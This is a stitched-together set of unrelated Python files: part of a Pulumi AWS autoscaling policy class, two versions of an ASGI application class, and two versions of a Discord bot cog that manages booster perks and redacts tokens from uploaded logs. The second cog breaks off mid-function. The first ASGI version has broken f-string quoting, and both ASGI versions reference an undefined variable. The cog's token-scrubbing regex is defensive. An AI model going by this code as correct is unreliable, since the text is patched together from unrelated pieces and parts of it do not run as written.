target_tracking_scaling_policy_configuration: Optional[pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']]] = None) -> 'Policy':
"""
Get an existing Policy resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN assigned by AWS to the scaling policy.
:param pulumi.Input[str] name: The name of the policy. Must be between 1 and 255 characters in length.
:param pulumi.Input[str] policy_type: The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
:param pulumi.Input[str] resource_id: The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] scalable_dimension: The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[str] service_namespace: The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
:param pulumi.Input[pulumi.InputType['PolicyStepScalingPolicyConfigurationArgs']] step_scaling_policy_configuration: Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
:param pulumi.Input[pulumi.InputType['PolicyTargetTrackingScalingPolicyConfigurationArgs']] target_tracking_scaling_policy_configuration: A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["name"] = name
__props__["policy_type"] = policy_type
__props__["resource_id"] = resource_id
__props__["scalable_dimension"] = scalable_dimension
__props__["service_namespace"] = service_namespace
__props__["step_scaling_policy_configuration"] = step_scaling_policy_configuration
__props__["target_tracking_scaling_policy_configuration"] = target_tracking_scaling_policy_configuration
return Policy(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
"""
The ARN assigned by AWS to the scaling policy.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the policy. Must be between 1 and 255 characters in length.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyType")
def policy_type(self) -> pulumi.Output[Optional[str]]:
"""
The policy type. Valid values are `StepScaling` and `TargetTrackingScaling`. Defaults to `StepScaling`. Certain services only support only one policy type. For more information see the [Target Tracking Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-target-tracking.html) and [Step Scaling Policies](https://docs.aws.amazon.com/autoscaling/application/userguide/application-auto-scaling-step-scaling-policies.html) documentation.
"""
return pulumi.get(self, "policy_type")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Output[str]:
"""
The resource type and unique identifier string for the resource associated with the scaling policy. Documentation can be found in the `ResourceId` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="scalableDimension")
def scalable_dimension(self) -> pulumi.Output[str]:
"""
The scalable dimension of the scalable target. Documentation can be found in the `ScalableDimension` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "scalable_dimension")
@property
@pulumi.getter(name="serviceNamespace")
def service_namespace(self) -> pulumi.Output[str]:
"""
The AWS service namespace of the scalable target. Documentation can be found in the `ServiceNamespace` parameter at: [AWS Application Auto Scaling API Reference](http://docs.aws.amazon.com/ApplicationAutoScaling/latest/APIReference/API_RegisterScalableTarget.html#API_RegisterScalableTarget_RequestParameters)
"""
return pulumi.get(self, "service_namespace")
@property
@pulumi.getter(name="stepScalingPolicyConfiguration")
def step_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyStepScalingPolicyConfiguration']]:
"""
Step scaling policy configuration, requires `policy_type = "StepScaling"` (default). See supported fields below.
"""
return pulumi.get(self, "step_scaling_policy_configuration")
@property
@pulumi.getter(name="targetTrackingScalingPolicyConfiguration")
def target_tracking_scaling_policy_configuration(self) -> pulumi.Output[Optional['outputs.PolicyTargetTrackingScalingPolicyConfiguration']]:
"""
A target tracking policy, requires `policy_type = "TargetTrackingScaling"`. See supported fields below.
"""
return pulumi.get(self, "target_tracking_scaling_policy_configuration")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
|
from .path import DNENode, DummyNode
from .request import Request, DummyRequest
from .response import Response, TextResponse, StaticResponse
from .error import NotResponseError, NoResponseReturnedError, NoMethodError, ResponseError
from .view import View
from queue import Empty as QueueEmpty
import asyncio
class AsgiApplication:
def __init__(self, handler):
self.handler = handler
async def __call__(self, scope, receive, send):
if scope["type"] == "http":
request = await Request.assemble(scope, receive)
## URL -> Node -> View
node, view = await self.get_node_view(request, scope)
if view is not None:
## Node, View -> Queue -> Response
resp_queue = self.view_to_response_queue(request, node, view)
responses = await self.get_responses(resp_queue)
try:
resp = responses[0] # cannot handle more than 1 response yet
except IndexError:
self.handler.logger.error(NoResponseReturnedError(f"No valid response is found when loading '{scope["path"]}'"))
resp = await self.load_error_response("500", request)
else:
resp = await self.load_error_response("500", request)
## Response + checks -> Header, Body -> Send
good_resp = await self.confirm_response(resp, request)
await self.send_response(send, good_resp)
# Logging
if self.handler.setting.print_connection_information:
self.handler.logger.info(self.handler.setting.app_logging_msg(request=request, response=good_resp))
elif scope["type"] == "lifespan":
pass
# Not even HTTP
else:
await self.send_response(send, await self.load_error_response("500", DummyRequest()))
async def get_node_view(self, request, scope):
if len(self.handler.setting.hosts_allowed) == 0 or request.host in self.handler.setting.hosts_allowed:
# Check static url
if scope["path"].find(self.handler.setting.static_url) == 0:
path = scope["path"].split(self.handler.setting.static_url)[1]
async def func(): return StaticResponse(path)
return DummyNode(), View(func)
# Get view from pages
node = self.handler.get_page(scope["path"])
if isinstance(node, DNENode):
view = await self.load_error_view("404")
else:
view = node.views.get(scope["method"])
if view is None:
self.handler.logger.error(NoMethodError(f"There is no {scope["method"]} method for {node.get_full_url_of_self()}"))
view = await self.load_error_view("501")
return node, view
return DummyNode(), await self.load_error_view("bad_host")
def view_to_response_queue(self, request, node, view):
request.set_extra_url(node.kwargs)
node.kwargs = {}
view.set_request(request)
view.set_await_send(self.handler.setting.await_send_mode)
return view()
@staticmethod
async def get_responses(resp_queue):
responses = []
while True:
try:
task = resp_queue.get(block=False)
except QueueEmpty:
break
else:
while not task.done(): await asyncio.sleep(0.001)
r = task.result()
if r is not None: responses.append(r) # ignore None in non-returning functions
return responses
async def confirm_response(self, resp, request):
if not isinstance(resp, Response):
self.handler.logger.warning(NotResponseError(
f"The returning object ({resp}) is not a Response object when loading "{scope["path"]}'"))
resp = TextResponse(str(resp))
try:
resp.set_handler(self.handler)
except ResponseError as e:
if isinstance(e.error_response, StaticResponse):
# Triggered when someone tried to load a static page that does not exist with direct url
resp = await self.load_error_response("404", request)
else:
# idk when it will be triggered. Just leave as a safeguard
resp = await self.load_error_response("502", request)
self.handler.logger.error(e)
return resp
async def load_error_response(self, error_code, request):
view = await self.load_error_view(error_code)
responses = await self.get_responses(self.view_to_response_queue(request, DummyNode(), view))
return responses[0]
async def load_error_view(self, error_code):
node = self.handler.error_pages.get_node(str(error_code))
return node.views.get("GET")
@staticmethod
async def send_response(send, resp):
await send(resp.head)
await send(resp.body)
if resp.callback_be_awaited:
await resp.callback()
else:
resp.callback()
| from .path import DNENode, DummyNode
from .request import Request, DummyRequest
from .response import Response, TextResponse, StaticResponse
from .error import NotResponseError, NoResponseReturnedError, NoMethodError, ResponseError
from .view import View
from queue import Empty as QueueEmpty
import asyncio
class AsgiApplication:
def __init__(self, handler):
self.handler = handler
async def __call__(self, scope, receive, send):
if scope["type"] == "http":
request = await Request.assemble(scope, receive)
## URL -> Node -> View
node, view = await self.get_node_view(request, scope)
if view is not None:
## Node, View -> Queue -> Response
resp_queue = self.view_to_response_queue(request, node, view)
responses = await self.get_responses(resp_queue)
try:
resp = responses[0] # cannot handle more than 1 response yet
except IndexError:
self.handler.logger.error(NoResponseReturnedError(f"No valid response is found when loading '{scope['path']}'"))
resp = await self.load_error_response("500", request)
else:
resp = await self.load_error_response("500", request)
## Response + checks -> Header, Body -> Send
good_resp = await self.confirm_response(resp, request)
await self.send_response(send, good_resp)
# Logging
if self.handler.setting.print_connection_information:
self.handler.logger.info(self.handler.setting.app_logging_msg(request=request, response=good_resp))
elif scope["type"] == "lifespan":
pass
# Not even HTTP
else:
await self.send_response(send, await self.load_error_response("500", DummyRequest()))
async def get_node_view(self, request, scope):
if len(self.handler.setting.hosts_allowed) == 0 or request.host in self.handler.setting.hosts_allowed:
# Check static url
if scope["path"].find(self.handler.setting.static_url) == 0:
path = scope["path"].split(self.handler.setting.static_url)[1]
async def func(): return StaticResponse(path)
return DummyNode(), View(func)
# Get view from pages
node = self.handler.get_page(scope["path"])
if isinstance(node, DNENode):
view = await self.load_error_view("404")
else:
view = node.views.get(scope["method"])
if view is None:
self.handler.logger.error(NoMethodError(f"There is no {scope['method']} method for {node.get_full_url_of_self()}"))
view = await self.load_error_view("501")
return node, view
return DummyNode(), await self.load_error_view("bad_host")
def view_to_response_queue(self, request, node, view):
request.set_extra_url(node.kwargs)
node.kwargs = {}
view.set_request(request)
view.set_await_send(self.handler.setting.await_send_mode)
return view()
@staticmethod
async def get_responses(resp_queue):
responses = []
while True:
try:
task = resp_queue.get(block=False)
except QueueEmpty:
break
else:
while not task.done(): await asyncio.sleep(0.001)
r = task.result()
if r is not None: responses.append(r) # ignore None in non-returning functions
return responses
async def confirm_response(self, resp, request):
if not isinstance(resp, Response):
self.handler.logger.warning(NotResponseError(
f"The returning object ({resp}) is not a Response object when loading '{scope['path']}'"))
resp = TextResponse(str(resp))
try:
resp.set_handler(self.handler)
except ResponseError as e:
if isinstance(e.error_response, StaticResponse):
# Triggered when someone tried to load a static page that does not exist with direct url
resp = await self.load_error_response("404", request)
else:
# idk when it will be triggered. Just leave as a safeguard
resp = await self.load_error_response("502", request)
self.handler.logger.error(e)
return resp
async def load_error_response(self, error_code, request):
view = await self.load_error_view(error_code)
responses = await self.get_responses(self.view_to_response_queue(request, DummyNode(), view))
return responses[0]
async def load_error_view(self, error_code):
node = self.handler.error_pages.get_node(str(error_code))
return node.views.get("GET")
@staticmethod
async def send_response(send, resp):
await send(resp.head)
await send(resp.body)
if resp.callback_be_awaited:
await resp.callback()
else:
resp.callback()
|
"""
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from discord.ext import commands, tasks
from fire.http import Route
import datetime
import aiohttp
import discord
import json
import uuid
import re
class Sk1er(commands.Cog, name='Sk1er Discord'):
def __init__(self, bot):
self.bot = bot
self.guild = self.bot.get_guild(411619823445999637)
self.nitro = discord.utils.get(self.guild.roles, id=585534346551754755)
self.testrole = discord.utils.get(self.guild.roles, id=645067429067751436)
self.gist = 'b070e7f75a9083d2e211caffa0c772cc'
self.gistheaders = {'Authorization': f'token {bot.config['github']}'}
self.modcoreheaders = {'secret': bot.config['modcore']}
self.pastebinre = r'https://pastebin\.com/([^raw]\w+)'
self.logregex = r'((hyperium-)?crash-\d{4}-\d{2}-\d{2}_\d{2}\.\d{2}\.\d{2}.+\.txt|latest\.log|launcher_log\.txt|hs_err_pid\d{1,8}\.log)'
self.logtext = [
'net.minecraft.launchwrapper.Launch',
'# A fatal error has been detected by the Java Runtime Environment:',
'---- Minecraft Crash Report ----',
'A detailed walkthrough of the error',
'launchermeta.mojang.com',
'Running launcher core',
'Native Launcher Version:',
'[Client thread/INFO]: Setting user:',
'[Client thread/INFO]: (Session ID is',
'MojangTricksIntelDriversForPerformance',
'[DefaultDispatcher-worker-1] INFO Installer',
'[DefaultDispatcher-worker-1] ERROR Installer'
]
self.secrets = r'(club\.sk1er\.mods\.levelhead\.auth\.MojangAuth|api\.sk1er\.club\/auth|LoginPacket|SentryAPI\.cpp|"authHash":|"hash":"|--accessToken|\(Session ID is token:|Logging in with details: |Server-Hash: |Checking license key :)'
self.emailre = r'[a-zA-Z0-9_.+-]{1,50}@[a-zA-Z0-9-]{1,50}\.[a-zA-Z0-9-.]{1,10}'
self.urlre = r'(?:https:\/\/|http:\/\/)[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)'
self.homere = r'(/Users/\w+|/home/\w+|C:\\Users\\\w+)'
self.description_updater.start()
@tasks.loop(minutes=5)
async def description_updater(self):
try:
m = (await self.bot.http.sk1er.request(Route('GET', '/mods_analytics')))['combined_total']
m += (await (await aiohttp.ClientSession().get('https://api.autotip.pro/counts')).json())['total']
m += (await (await aiohttp.ClientSession().get('https://api.hyperium.cc/users')).json())['all']
await self.guild.edit(description=f'The Official Discord for Sk1er & Sk1er Mods ({m:,d} total players)')
except Exception as e:
pass
def cog_unload(self):
self.description_updater.cancel()
async def cog_check(self, ctx: commands.Context):
if ctx.guild.id == 411619823445999637:
return True
return False
@commands.Cog.listener()
async def on_member_remove(self, member):
if self.nitro in member.roles or self.testrole in member.roles:
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(route, headers=self.gistheaders)
except Exception:
self.bot.logger.error(f'$REDFailed to fetch booster gist for $CYAN{member}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(member.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove nitro perks for $CYAN{mcuuid}')
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{member} left and their nitro perks have been removed.')
@commands.Cog.listener()
async def on_member_update(self, before, after):
if self.testrole in after.roles and after.id != 287698408855044097:
await after.remove_roles(self.testrole, reason='not geek')
if before.roles != after.roles:
broles = []
aroles = []
changed = []
for role in before.roles:
broles.append(role)
for role in after.roles:
aroles.append(role)
s = set(aroles)
removed = [x for x in broles if x not in s]
if self.nitro in removed or (self.testrole in removed and after.id == 287698408855044097):
if not self.bot.isascii(after.nick or after.name) or self.bot.ishoisted(after.nick or after.name):
await after.edit(nick=f'John Doe {after.discriminator}')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to get booster gist for $CYAN{after}')
return
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return
try:
user = next(i for i in current if i["id"] == str(after.id))
mcuuid = user['uuid']
current.remove(user)
except Exception:
return
route = Route(
'GET',
f'/nitro/{mcuuid}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.error(f'$REDFailed to remove modcore nitro perks for $CYAN{mcuuid}')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
return
general = self.guild.get_channel(411620457754787841)
await general.send(f'{after.mention} Your nitro perks have been removed. Boost the server to get them back :)')
async def haste(self, content, fallback: bool=False):
url = 'hst.sh'
if fallback:
url = 'h.inv.wtf'
async with aiohttp.ClientSession().post(f'https://{url}/documents', data=content) as r:
if r.status != 200 and not fallback:
return await self.haste(content, fallback=True)
j = await r.json()
return f'<https://{url}/' + j['key'] + '>'
@commands.Cog.listener()
async def on_message(self, message):
if self.bot.dev:
return
pastebin = re.findall(self.pastebinre, message.content, re.MULTILINE)
for p in pastebin:
async with aiohttp.ClientSession().get(f'https://pastebin.com/raw/{p}') as r:
message.content = re.sub(self.pastebinre, (await r.text()), message.content, 0, re.MULTILINE)
for attach in message.attachments:
if not re.match(self.logregex, attach.filename) and not attach.filename == 'message.txt':
return
try:
txt = await attach.read()
except Exception as e:
self.bot.logger.error(f'$REDFailed to read log sent by $CYAN{message.author}', exc_info=e)
try:
txt = txt.decode('utf-8')
except Exception:
try:
txt = txt.decode('ISO-8859-1')
except Exception as e:
self.bot.logger.error(f'$REDFailed to decode log sent by $CYAN{message.author}', exc_info=e)
return # give up, leave the file there
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in txt for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} uploaded a log, {message.content}\n{url}')
if not message.attachments and len(message.content) > 350:
txt = message.content
txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
for line in txt.split('\n'):
if re.findall(self.secrets, line, re.MULTILINE):
txt = txt.replace(line, '[line removed to protect sensitive info]')
if any(t in message.content for t in self.logtext) and message.guild.id == 411619823445999637:
try:
url = await self.haste(txt)
except Exception as e:
self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
return
await message.delete()
return await message.channel.send(f'{message.author} sent a log, {url}')
@commands.command(description='Adds perks for Nitro Boosters')
async def nitroperks(self, ctx, ign: str = None):
if self.nitro not in ctx.author.roles and self.testrole not in ctx.author.roles:
return await ctx.send('no')
if not ign:
return await ctx.error('You must provide your Minecraft name!')
mid = await self.bot.get_cog('Hypixel Commands').name_to_uuid(ign)
if not mid:
return await ctx.error('No UUID found!')
progress = await ctx.send('Give me a moment.')
route = Route(
'GET',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
headers=self.gistheaders
)
except Exception:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
current = json.loads(text)
if 'error' in current:
return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
try:
user = next(i for i in current if i["id"] == str(ctx.author.id))
route = Route(
'GET',
f'/nitro/{user['uuid']}/false'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
return await progress.edit(f'<:xmark:674359427830382603> Failed to remove perks from previous user, {user['ign']}')
current.remove(user)
user['uuid'] = str(uuid.UUID(mid))
user['ign'] = ign
except Exception:
user = {
"uuid": str(uuid.UUID(mid)),
"ign": ign,
"id": str(ctx.author.id),
"color": "LIGHT_PURPLE"
}
current.append(user)
route = Route(
'GET',
f'/nitro/{user['uuid']}/true'
)
try:
await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
except Exception as e:
self.bot.logger.warn(f'$YELLOWFailed to give perks on modcore', exc_info=e)
await ctx.error(f'Failed to give perks on modcore.')
payload = {
'description': 'Nitro Booster dots for the Hyperium Client!',
'files': {
'boosters.json': {
'content': json.dumps(current, indent=2)
}
}
}
route = Route(
'PATCH',
f'/gists/{self.gist}'
)
try:
gist = await self.bot.http.github.request(
route,
json=payload,
headers=self.gistheaders
)
except Exception:
return await ctx.error('Failed to give you the perks in Hyperium')
return await progress.edit(content='<:check:674359197378281472> Successfully gave you the perks!')
def setup(bot):
    """Extension entry point: register the Sk1er cog with the bot."""
    cog = Sk1er(bot)
    bot.add_cog(cog)
    bot.logger.info('$GREENLoaded cog for discord.gg/sk1er!')
| """
MIT License
Copyright (c) 2020 GamingGeek
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from discord.ext import commands, tasks
from fire.http import Route
import datetime
import aiohttp
import discord
import json
import uuid
import re
class Sk1er(commands.Cog, name='Sk1er Discord'):
    """Cog for the Sk1er guild.

    Keeps the guild description updated with a combined player count,
    scrubs and re-hosts anything that looks like a Minecraft log, and
    manages Nitro Booster perks (a GitHub gist consumed by the Hyperium
    client plus the modcore API).
    """

    def __init__(self, bot):
        self.bot = bot
        # NOTE(review): assumes the guild and these roles are already cached
        # when the cog loads; get_guild returns None otherwise — confirm load
        # order before changing.
        self.guild = self.bot.get_guild(411619823445999637)
        self.nitro = discord.utils.get(self.guild.roles, id=585534346551754755)
        self.testrole = discord.utils.get(self.guild.roles, id=645067429067751436)
        # Gist holding boosters.json, read by the Hyperium client.
        self.gist = 'b070e7f75a9083d2e211caffa0c772cc'
        self.gistheaders = {'Authorization': f'token {bot.config["github"]}'}
        self.modcoreheaders = {'secret': bot.config['modcore']}
        # Matches non-raw pastebin links; the capture group is the paste id.
        self.pastebinre = r'https://pastebin\.com/([^raw]\w+)'
        # Filenames that look like Minecraft crash reports / launcher logs.
        self.logregex = r'((hyperium-)?crash-\d{4}-\d{2}-\d{2}_\d{2}\.\d{2}\.\d{2}.+\.txt|latest\.log|launcher_log\.txt|hs_err_pid\d{1,8}\.log)'
        # Snippets whose presence identifies text as a game/launcher log.
        self.logtext = [
            'net.minecraft.launchwrapper.Launch',
            '# A fatal error has been detected by the Java Runtime Environment:',
            '---- Minecraft Crash Report ----',
            'A detailed walkthrough of the error',
            'launchermeta.mojang.com',
            'Running launcher core',
            'Native Launcher Version:',
            '[Client thread/INFO]: Setting user:',
            '[Client thread/INFO]: (Session ID is',
            'MojangTricksIntelDriversForPerformance',
            '[DefaultDispatcher-worker-1] INFO Installer',
            '[DefaultDispatcher-worker-1] ERROR Installer'
        ]
        # Lines containing these markers may leak tokens and are removed.
        self.secrets = r'(club\.sk1er\.mods\.levelhead\.auth\.MojangAuth|api\.sk1er\.club\/auth|LoginPacket|SentryAPI\.cpp|"authHash":|"hash":"|--accessToken|\(Session ID is token:|Logging in with details: |Server-Hash: |Checking license key :)'
        self.emailre = r'[a-zA-Z0-9_.+-]{1,50}@[a-zA-Z0-9-]{1,50}\.[a-zA-Z0-9-.]{1,10}'
        self.urlre = r'(?:https:\/\/|http:\/\/)[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&\/\/=]*)'
        self.homere = r'(/Users/\w+|/home/\w+|C:\\Users\\\w+)'
        self.description_updater.start()

    @tasks.loop(minutes=5)
    async def description_updater(self):
        """Refresh the guild description with the combined player count."""
        try:
            m = (await self.bot.http.sk1er.request(Route('GET', '/mods_analytics')))['combined_total']
            # fix: use one properly-closed session; the original leaked a new
            # ClientSession per request.
            async with aiohttp.ClientSession() as session:
                async with session.get('https://api.autotip.pro/counts') as r:
                    m += (await r.json())['total']
                async with session.get('https://api.hyperium.cc/users') as r:
                    m += (await r.json())['all']
            await self.guild.edit(description=f'The Official Discord for Sk1er & Sk1er Mods ({m:,d} total players)')
        except Exception:
            # Best-effort background task; failures are intentionally ignored.
            pass

    def cog_unload(self):
        # Stop the background loop so the task doesn't outlive the cog.
        self.description_updater.cancel()

    async def cog_check(self, ctx: commands.Context):
        """Restrict the cog's commands to the Sk1er guild."""
        if ctx.guild.id == 411619823445999637:
            return True
        return False

    @commands.Cog.listener()
    async def on_member_remove(self, member):
        """Strip a leaver's booster perks from the gist and modcore."""
        if self.nitro in member.roles or self.testrole in member.roles:
            route = Route(
                'GET',
                f'/gists/{self.gist}'
            )
            try:
                gist = await self.bot.http.github.request(route, headers=self.gistheaders)
            except Exception:
                self.bot.logger.error(f'$REDFailed to fetch booster gist for $CYAN{member}')
                return
            text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
            current = json.loads(text)
            if 'error' in current:
                return
            try:
                user = next(i for i in current if i["id"] == str(member.id))
                mcuuid = user['uuid']
                current.remove(user)
            except Exception:
                # Member had no entry in the booster list; nothing to do.
                return
            payload = {
                'description': 'Nitro Booster dots for the Hyperium Client!',
                'files': {
                    'boosters.json': {
                        'content': json.dumps(current, indent=2)
                    }
                }
            }
            route = Route(
                'GET',
                f'/nitro/{mcuuid}/false'
            )
            try:
                await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
            except Exception as e:
                # Log with traceback; continue so the gist still gets patched.
                self.bot.logger.error(f'$REDFailed to remove nitro perks for $CYAN{mcuuid}', exc_info=e)
            route = Route(
                'PATCH',
                f'/gists/{self.gist}'
            )
            try:
                gist = await self.bot.http.github.request(
                    route,
                    json=payload,
                    headers=self.gistheaders
                )
            except Exception:
                self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
                return
            general = self.guild.get_channel(411620457754787841)
            await general.send(f'{member} left and their nitro perks have been removed.')

    @commands.Cog.listener()
    async def on_member_update(self, before, after):
        """Remove perks when the booster role is lost; police the test role."""
        if self.testrole in after.roles and after.id != 287698408855044097:
            await after.remove_roles(self.testrole, reason='not geek')
        if before.roles != after.roles:
            # fix: the unused broles/aroles/changed scaffolding is gone; only
            # the roles removed in this update matter here.
            after_roles = set(after.roles)
            removed = [role for role in before.roles if role not in after_roles]
            if self.nitro in removed or (self.testrole in removed and after.id == 287698408855044097):
                if not self.bot.isascii(after.nick or after.name) or self.bot.ishoisted(after.nick or after.name):
                    await after.edit(nick=f'John Doe {after.discriminator}')
                route = Route(
                    'GET',
                    f'/gists/{self.gist}'
                )
                try:
                    gist = await self.bot.http.github.request(
                        route,
                        headers=self.gistheaders
                    )
                except Exception:
                    self.bot.logger.error(f'$REDFailed to get booster gist for $CYAN{after}')
                    return
                text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
                current = json.loads(text)
                if 'error' in current:
                    return
                try:
                    user = next(i for i in current if i["id"] == str(after.id))
                    mcuuid = user['uuid']
                    current.remove(user)
                except Exception:
                    # No entry for this member; nothing to remove.
                    return
                route = Route(
                    'GET',
                    f'/nitro/{mcuuid}/false'
                )
                try:
                    await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
                except Exception as e:
                    self.bot.logger.error(f'$REDFailed to remove modcore nitro perks for $CYAN{mcuuid}', exc_info=e)
                payload = {
